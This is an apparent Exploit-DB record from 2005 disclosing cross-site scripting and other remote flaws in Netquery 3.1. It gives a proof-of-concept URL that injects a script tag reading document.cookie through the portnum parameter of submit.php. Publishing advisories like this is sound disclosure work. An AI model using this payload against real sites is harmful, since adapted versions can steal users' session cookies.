Netquery 3.1 submit.php portnum Parameter XSS

2005-07-25T00:00:00
ID EDB-ID:26025
Type exploitdb
Reporter rgod
Modified 2005-07-25T00:00:00

Description

Netquery 3.1 submit.php portnum Parameter XSS. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/14373/info

Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks.

Netquery 3.1 is affected by these vulnerabilities. 

http://www.example.com/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>